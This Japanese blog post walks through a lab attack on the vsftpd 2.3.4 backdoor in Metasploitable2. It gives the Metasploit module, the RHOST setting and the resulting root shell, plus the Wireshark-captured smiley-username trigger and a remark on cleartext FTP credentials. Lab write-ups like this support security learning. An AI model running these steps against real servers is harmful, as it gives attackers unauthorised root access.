metasploitable2 vsftpd 攻略

metasploitable2 vsftpd 攻略
まず、virtualbox で
BT5R3
metasploitable2
の両方を起動
以下は、BT5R3 の操作ログ
root
でログインして
startx
でGUI起動
service nessusd start
でNessus起動
msfconsole

MSF起動
load nessus
で MSFから Nessus 接続機能ロード
nessus_connect hjuser:Nessusのパスワード@127.0.0.1
でNessus 接続
search vsftpd
で検索すると
VSFTPD v2.3.4 Backdoor Command Execution
バックドアの脆弱性と表示される
use コマンドで使用する exploit を指定
use exploit/unix/ftp/vsftpd_234_backdoor
show options
で指定可能なオプションを確認
オプションが確認できたら
RHOST の指定をする
payload の指定は不要
set RHOST 192.168.10.214
書式にすると
set RHOST metasploitable2 のIPアドレス
設定完了後Exploit を実行する
exploit
で実行
この状態になるとカーソルが点滅して何も表示されないけど
id;
とすれば
uid=0(root) gid=0(root)
と表示され、root権限であることが確認できる
また、ifconfig;
で、metasploitable2 のIPであることが確認できる
これにより、侵入成功の確認ができる
バックドアの接続切断には
Ctrl+c で
Abort session 1? [y/N]
と表示されるので
y
とすれば、セッション終了となる
このときのパケットの流れを wireshark で見る事ができる
端末から wireshark とすれば起動できるので
見てみた
書籍だと
Request: USER 4l:)
Request: PASS s
だったけど
私の場合
Request: USER cMwmJ:)
Request: PASS bma52C
でした
FTPの場合
ID、パスワードがまる見えなので
SFTP とか SCP を使わないと
wireshark などで簡単にみれてしまいます
ちなみに、今回の脆弱性は
user ID として
🙂 で終わる3文字以上の文字列なら
パスワードは何でもOKというものです
今回の参考書籍は

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です